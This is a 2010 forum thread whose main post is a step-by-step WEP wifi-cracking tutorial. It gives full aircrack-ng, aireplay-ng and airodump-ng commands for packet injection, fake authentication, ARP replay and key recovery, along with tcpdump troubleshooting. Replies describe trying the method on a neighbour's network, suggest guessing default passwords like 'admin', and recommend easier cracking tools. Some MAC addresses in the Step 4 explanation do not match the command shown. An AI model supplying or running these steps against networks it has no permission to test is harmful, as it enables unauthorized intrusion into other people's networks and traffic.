Nytro Posted September 18, 2010

CRACK WIFI – Simple WEP Crack

Overview
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Equipment used
Wifi Adaptor: Alfa AWUS036H (available on eBay & Amazon)
Software: Backtrack 4 (free download from BackTrack Linux - Penetration Testing Distribution)

Step 1 – Start the wireless interface in monitor mode on the AP channel
airmon-ng start wlan1 6
starts the wifi interface on channel 6

Step 2 – Test wireless device packet injection
aireplay-ng -9 -e infosec -a 00:1B:11:24:27:2E wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs
airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated, then the AP ignores the packet and sends out a "DeAuthentication" packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address

OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.

Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and...
Run: tcpdump -n -vvv -s0 -e -i wlan1 | grep -i -E "(RA:|Authentication|ssoc)"
You would then look for error messages.
If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and...
Run: tcpdump -n -e -s0 -vvv -i wlan1
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth
You may need to tweak the phrase "DeAuth" to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode
aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:1B:11:24:27:2E output*.cap

All Done!
Source: Crack Wifi | Hacking Articles
icebird Posted September 18, 2010 I usually put in 13 zeros and it works
dancdc Posted December 20, 2010 or admin .. and surprise, it works in 30% of cases, tested all over Europe
aurascalarasi09 Posted December 25, 2010 There are other similar programs too, and much easier to use
wolfy574 Posted December 27, 2010 which programs would those be? the aircrack method seems rather complicated to me, I tried it on my neighbour and it doesn't work . . . post a few more efficient applications if you have any, merry x-mas
Golfo Posted February 2, 2011 wifiway? wifislax? have you tried them?